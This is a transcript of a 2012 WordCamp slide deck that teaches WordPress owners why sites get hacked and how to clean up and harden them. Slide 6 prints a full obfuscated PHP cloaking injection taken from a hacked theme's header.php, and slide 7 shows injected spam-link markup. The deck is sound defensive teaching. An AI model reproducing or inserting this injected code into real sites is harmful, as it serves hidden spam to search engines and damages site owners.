Justin Jones - Presentation at WordCamp Columbus, OH on 7/15/2012 regarding WordPress security

1. Justin Jones • Fort Wayne, IN @jjonesftw

2. I’m Justin Jones
0 Teacher
0 Church Worker
0 WordPress hobbyist
0 Podcast cohost at
“The Weekly Theme Show”
0 @jjonesftw
0 justinjones.net

3. Why would someone want to
hack my site?
0 The world doesn’t revolve around you
0 Crime of opportunity
0 Don’t leave your front door unlocked
0 “Black Hat” SEO
0 To make money directly
0 Affiliate sales
0 Rogue virus scanners
0 Ransomeware

4. Why would someone want to
hack my site?
0 Serve up images and content for SPAM email

5. What do they do while they’re
poking around my site?
0 Alter robots.txt
0 Override the WordPress generated robots.txt to add
their pages into search engines
0 Create backdoors in unsuspecting .php files for future
attacks
0 Add their own .php files and images to serve up their
payload content
0 Some are specific to “robots” or HTTP Referrer

6. What do they do while they’re
poking around my site?
0 Inject code into theme files, like header.php
<?
//1234
$GLOBALS['_2008634924_']=Array('error_re' .'porting','function_e' .'xi' .'st' .'s','fop' .'e' .'n','fwrite','' .'f'
.'clos' .'e','' .'s' .'trstr','strtolower','ex' .'p' .'lode','ip2long','i' .'p2l' .'ong','l' .'ong2ip','ip2long',''
.'fi' .'le_exists','pre' .'g_mat' .'ch','file_ge' .'t_contents','pr' .'eg_match','f' .'i' .'le' .'_get' .'_c' .'ont'
.'ent' .'s','u' .'nseriali' .'ze','count','range','a' .'rra' .'y_splice','array_' .'values','preg' .'_matc' .'h','file'
.'_get_' .'contents','un' .'ser' .'ial' .'iz' .'e','gzuncompress','base' .'64_deco' .'de','' .'str' .'len'); function
_1572011439($i){$afa=Array('Ym90a28=','ZmlsZV9wd' .'XRf' .'Y2' .'9ud' .'GV' .'udHM=','dw==','Z29v' .'Z' .'2' .'xl','c2x'
.'1cnA=','' .'bXN' .'uY' .'m' .'90','Yml' .'u' .'Z2JvdA==','Ym90','Y' .'3' .'Jhd2' .'w' .'=','' .'c3BpZGV' .'y','cm9'
.'ib3Q=','' .'SH' .'R0cENsaWVudA=' .'=','' .'Y3' .'V' .'y' .'b' .'A' .'==','' .'c2' .'Nvb3Rlcg==','d3d3c3' .'Rlcg==',''
.'UHl0aG9' .'u','' .'dX' .'J' .'sb' .'Gli','cG' .'Vyb' .'A=' .'=','bGlid3d3','b' .'HlueA==','VkIgUHJva' .'mVjd' .'A='
.'=','U' .'Hl0aG' .'9uLXVybGxpYi8yL' .'j' .'Y=','TW9' .'6a' .'Wx' .'sYS' .'82N' .'jYuKD' .'Y' .'p','TW9' .'6' .'aWxs'
.'YS80L' .'jAgK' .'GNvbXB' .'hdGli' .'b' .'G' .'U7IE1' .'TS' .'UUgNi4w' .'OyBXa' .'W5kb3dzIE5UIDUuMS' .'k=','T'
.'W96aWx' .'sYS' .'8' .'0LjA' .'g' .'KGNv' .'bX' .'Bh' .'dGl' .'i' .'bGU' .'7KQ==','' .'TW96aWxsYS80' .'LjAgK' .'GNvbXB'
.'hdGlibG' .'U7IE1TSUUgNS4w' .'MDsg' .'V' .'2luZG' .'93cyA5OCk=','' .'TW' .'96' .'aWxsYS8' .'0LjAgKG' .'NvbXBhdGlibG'
.'U7I' .'E' .'1' .'TSUUg' .'N' .'i4wO' .'yBX' .'aW5' .'kb3dzIE5UIDUuMTsg' .'U1YxK' .'Q' .'==','' .'TW96' .'aWxs' .'YS80'
.'LjAg' .'KGNvb' .'X' .'Bh' .'dGlibGU7IE' .'1TSUUgN' .'i4wOyBXaW5kb3dzIE5UIDU' .'uMTsgLk5FV' .'C' .'BDTF' .'IgM' .'S4wL'
.'jM' .'p','Lw==','Lm' .'N' .'vcmU' .'=','fDxpc' .'D4oLiopPC9pc' .'D58VWl' .'z','LmNvcmU=','' .'fDx' .'p' .'cD4'
.'oLiopPC9pc' .'D58V' .'W' .'lz','bGlj' .'ZW' .'5zZ' .'S50eH' .'Q=','U' .'kVNT1RF' .'X0' .'FERFI=','SF' .'R' .'U'
.'UF9VU0' .'VSX0FH' .'RU' .'5U','Ym90' .'a2' .'8=','fDx' .'pbnQ+KC4q' .'K' .'T' .'wv' .'aW50Pnx' .'VaX'
.'M=','bGljZW5zZS50' .'eHQ=','' .'UkVR' .'VUV' .'TVF9VUkk=','' .'PGJ' .'yPg' .'==');return base64_decode($afa[$i]);}
if(isset($_GET[_1572011439(0)])){}else{$GLOBALS['_2008634924_'][0](0);}if(!$GLOBALS['_2008634924_'][1](_1572011439(1))){
function l__0($_0,$_1){$_2=@$GLOBALS['_2008634924_'][2]($_0,_1572011439(2));if(!$_2){return
false;}else{$_3=$GLOBALS['_2008634924_'][3]($_2,$_1);$GLOBALS['_2008634924_'][4]($_2);return $_3;}}}function
l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_157201143
9(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_15
72011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439
(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS['_2008634924_'][5]
($GLOBALS['_2008634924_'][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS
['_2008634924_'][7](_1572011439(28),$_8);$_11=$GLOBALS['_2008634924_'][8]($_10[0]);$_12=$GLOBALS['_2008634924_'][9]($_10
[1]);$_13=$GLOBALS['_2008634924_'][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-
$_10[1]);$_14=$GLOBALS['_2008634924_'][11]($_9);return($_14&$_13)==($_11&$_13);}function
l__3($REMOTE_ADDR){if($GLOBALS['_2008634924_'][12](_1572011439(29))){$GLOBALS['_2008634924_'][13](_1572011439(30),$GLOBA
LS['_2008634924_'][14](_1572011439(31)),$_15);}else{$GLOBALS['_2008634924_'][15](_1572011439(32),$GLOBALS['_2008634924_'
][16](_1572011439(33)),$_15);}$_16=$GLOBALS['_2008634924_'][17]($_15[1]);foreach($_16 as
$_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return
(int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS['_2008634924_'][18]($_20);if($_23<$_18){return
false;}$_24=$GLOBALS['_2008634924_'][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--
);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS['_2008634924_'][20]($_24,$_26,1);$_24=$GLOBALS['_2008634924_'][21]($
_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 or
isset($_GET[_1572011439(36)])or $_28){$GLOBALS['_2008634924_'][22](_1572011439(37),$GLOBALS
['_2008634924_'][23](_1572011439(38)),$_29);$_30=$GLOBALS['_2008634924_'][24]($GLOBALS['_2008634924_'][25]($GLOBALS['_20
08634924_'][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS['_2008634924_'][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_2
5<75;$_25++)echo $_31[$_25] ._1572011439(40);}
//1234
?>

7. What do they do while they’re
poking around my site?
0 Inject code into theme files, like header.php
<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>

8. How Do They Get In?
0 Outdated versions of WordPress
0 Outdated themes and plugins
0 Hosting providers behind the times
0 Insecure password / brute force
0 Compromised computer
0 Passwords cached in FTP clients, passwords stored in an
unencrypted text file etc…
0 Unsecure internet connection
0 Rogue access points
0 Packet sniffers on public WiFi

9. What are the consequences?
0 Google will punish you.
0 Google Safe Browsing or manual removal action

10. What are the consequences?
0 Google will punish you.
0 Google Safe Browsing or manual removal action

11. What are the consequences?
0 Google will punish you.
0 Google Safe Browsing or manual removal action

12. What are the consequences?
0 Other “blacklisting” like Norton Safe Web, Phish Tank,
Opera, Sucuri, and many others
0 Spammy content will get indexed with every search
engine
0 Don’t forget about directory listing sites, like Google
Places / Google Maps
0 Your host may dump you for violating TOS
0 Be a good neighbor!

13. What are the consequences?
0 Be a good neighbor! Security is everyone’s
responsibility

14. What are the consequences?
0 Malware cost the US economy 2.2 billion dollars in
lost productivity in 2011
0 Are you an ecommerce site?
0 Payment gateway is probably offsite, but what about
people’s email addresses?
0 Membership site?
0 Many people re-use passwords
0 Linked In, Last.fm, many others recently
0 Business or organization?
0 How much street cred will you earn serving content
from exotic-dildos.co.cc

15. Is WordPress insecure?
0 No.
0 Pharma hack had a patch out before exploited
0 WordPress has a target on its back
0 WordPress is used by over 14.7% of Alexa Internet's
"top 1 million" websites and as of August 2011 manages
22% of all new websites.
0 Some theme and plugin authors are lazy/sloppy, or
use depreciated/inefficient methods
0 You are your own worst enemy!
0 Think about Windows XP back in like 2002

16. Is WordPress insecure?
0 Be careful who you trust
0 Everyone is a “developer” now
0 NEVER download and install a theme for free that you
should have paid for
0 Shady scraper sites, torrents, etc…
0 “Having a website *should* cost you more than $300 a year.
If it doesn’t, then you’re doing it wrong.” --Otto

17. Is WordPress insecure?
0 Be careful who you trust
0 Be very wary of downloading a free theme outside of the
WordPress.org theme repo
0 Use “Theme Authenticity Checker” and “Theme Check”
0 Siobhan McKeown at WPMU.org Google’d “free wordpress
themes”
0 Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using
encrypted code to insert spammy links
0 Use trusted theme marketplaces or commercial shops

18. Prepare for Disaster
0 It’s going to happen
0 Maintain regular
backups
0 Server side or Plugins
0 Be registered with
Google Webmaster Tools
0 Know how to contact
your hosting provider
0 Know a developer
0 Visit your site
0 Watch your stats

19. Update. Update. Update.
0 Source: http://churchm.ag/wordpress-updates/

20. Update. Update. Update.
0 August 2011, so 3.2.1
was most current
0 Less than half of the top
100k sites running
WordPress were up to
date!
0 WordPress interates
quickly to patch security
holes. Keep updated to
benefit from their work
0 Source: http://churchm.ag/wordpress-updates/

21. Update. Update. Update.
0 WordPress core, .org plugins and .org themes can use
the core update functionality
0 Some commercial theme and plugins have their own
way of one click upgrade, some are manual only
0 Some have notifications, some don’t
0 Sign up for WordPress.org release notifications from
download page

22. Here’s Where This Gets Technical
0 I’ll have these slides up on Slide Share
0 I’ve reserved time at the end for questions, and I’ll be
available after for individual questions

23. It’s the week before Easter and your
church site is serving up topless
photos of celebrities. Now What?
0 Take a deep breath and crack open a beer. You’ve got
some work ahead of you.
0 Get back control of your site
0 Get the site offline if you can!

24. It’s the week before Easter and your
church site is serving up topless
photos of celebrities. Now What?
0 Change *every* single one of your passwords
0 Domain registrar, hosting account, all WordPress users,
SQL database username and password, FTP account
password
0 I suggest changing your email account passwords
0 Hire a professional
0 Check out http://sucuri.net/
0 Many others out there, Google them up!

25. It’s the week before Easter and your
church site is serving up topless
photos of celebrities. Now What?
0 Regenerate WordPress secret keys / salts
0 Manually in wp-config.php or use a plugin
define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');
define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');
define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');
define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');
define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');
define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');
define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');
define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');

26. It’s the week before Easter and your
church site is serving up topless
photos of celebrities. Now What?
0 Backup
0 Restore from a previous backup
0 Find and delete all the junk they added
0 Very insidious. Creating rogue sitemaps, modifying
.htaccess files, creating backdoors, adding index.php
files to override permalinks, etc…
0 Adding posts and images to database
0 Reinstall WordPress core, plugins and themes

27. It’s the week before Easter and your
church site is serving up topless
photos of celebrities. Now What?
0 Begin the process of restoring your good name
0 Request delisting of bogus content from Google and
other search engines
0 Very tedious, manual process
0 Request reevaluation from blacklisting services
0 Don’t forget about other services that pull content from
your site, like Google places
0 Wait it out. This will take weeks and months
0 Prepare better for next time

28. Harden Your Site.
The Easy Stuff.
0 Keep up to date! WordPress, plugins, themes – but
also PHP version on your host
0 Use strong passwords – no words! Not P@$$woRd
either.
0 Consider using a password manager
0 Remove “admin” user

29. Harden Your Site.
The Easy Stuff.
0 Only connect using SFTP
0 Never ever hack core WordPress files
0 Keep a clean house!
0 Other WP installs, other PHP services, plugins, old
themes
0 Disable user registration

30. Harden Your Site.
The More Complicated Stuff.
0 Store your wp-config file outside of public_html
0 Done at install or can be moved later
0 Change the database prefix
0 Use strong database passwords
0 Use proper 755 file permissions
0 If a plugin or theme asks you to set 777, avoid.

31. Harden Your Site.
The More Complicated Stuff.
0 Only log in to site using SSL (https://...)
0 Don’t advertise that you’re running an out of date
version
0 Remove readme.html (plugins available)
0 Remove WordPress version from header (plugins
available)

32. Harden Your Site.
The More Complicated Stuff.
0 Plugins! Plugins! Plugins!
0 Monitor core / template files
0 “WordPress File Monitor Plus”
0 Scan template files for suspicious code
0 “AntiVirus”
0 WP and server security settings
0 “WebsiteDefender WordPress Security”
0 Keep up to date
0 “Update Notifications”

33. Harden Your Site.
The More Complicated Stuff.
0 Plugins! Plugins! Plugins!
0 “WordPress Firewall 2”
0 “Block Bad Queries”
0 Backup
0 VaultPress
0 BackupBuddy
0 Login Lockdown
0 Lock out excessive retries and mask login errors
0 Many others available for two factor auth, etc…
0 Sucuri plugin has a firewall to block known bad IP’s

34. Should you really be hosting
your own site?
0 Do you like to change your own oil in your car or take
it to the Jiffy Lube?
0 WordPress.com is a great resource for most personal
bloggers. Focus on writing your content.
0 Consider a WordPress managed host.
0 WP Engine, ZippyKid, Pagely, etc…
0 Don’t be afraid to pay someone!
0 How important is this project?
0 What is your time worth?

35. Resources
0 Codepoet.com
0 eBook “Locking Down
WordPress”

36. Resources
0 These slides on Slide Share
0 Search for slides from Dre Armeda and Brad Williams
0 WordPress.org Codex
0 Otto on WordPress
0 Sucuri.net – service and blog
0 Lockdown WordPress – A Security Webinar with Dre
Armeda
0 1.5 hour interview – great resource!
0 Countless plugins on the WordPress.org repo
0 http://sitecheck.sucuri.net/scanner/

37. Questions?
0 No question is stupid. We’re all here to learn!
0 If you’re smarter than I am, please jump in here.